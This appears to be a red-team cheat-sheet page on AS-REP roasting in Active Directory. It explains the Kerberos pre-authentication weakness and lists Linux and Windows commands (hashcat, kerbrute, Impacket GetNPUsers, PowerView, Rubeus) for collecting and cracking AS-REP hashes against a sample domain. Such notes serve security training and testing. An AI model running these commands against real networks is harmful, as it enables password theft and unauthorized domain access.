ASREProasting

ABOUT

Usually in Kerberos protocol, we are sending timestamp, encrypted with our password's hash, KDC checks it and if it's true, it sends us TGT. But with Pre-Auth turned OFF it works different (like in old Kerberos versions): We can just ask for TGT, and if we are decrypted it with our password, we are allowed in.

So in AS-REProasting we need to look for account with Pre-Auth turned OFF, so we can ask for TGT, so we can try to crack AS-REP request to get password.

Also if we have GenericWrite or GenericAll rights over account, but we don't know it's password, we could make it turn-off Pre-Auth, crack it, and get the password.

LINUX

Hashcat AS-REP Crack

hashcat -m 18200 militech_asrep /usr/share/wordlists/rockyou.txt

Kerbrute AS-REP Retrieve

Kerbrute will automatically get AS-REP's for users which do not have pre-auth

kerbrute userenum -d militech.local --dc 13.13.13.13 /opt/jsmith.txt --hash-file

Impacket's GetNPUsers

GetNPUsers.py MILITECH.LOCAL/ -dc-ip 13.13.13.13 -no-pass -usersfile valid_ad_users 

WINDOWS

PowerView Check

PS C:\> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

Rubeus ASREProasting

PS C:\> .\Rubeus.exe asreproast /user:sreed /nowrap /format:hashcat

RESOURCES

ASREProast | The Hacker Recipes

Roasting AS-REPsharmj0y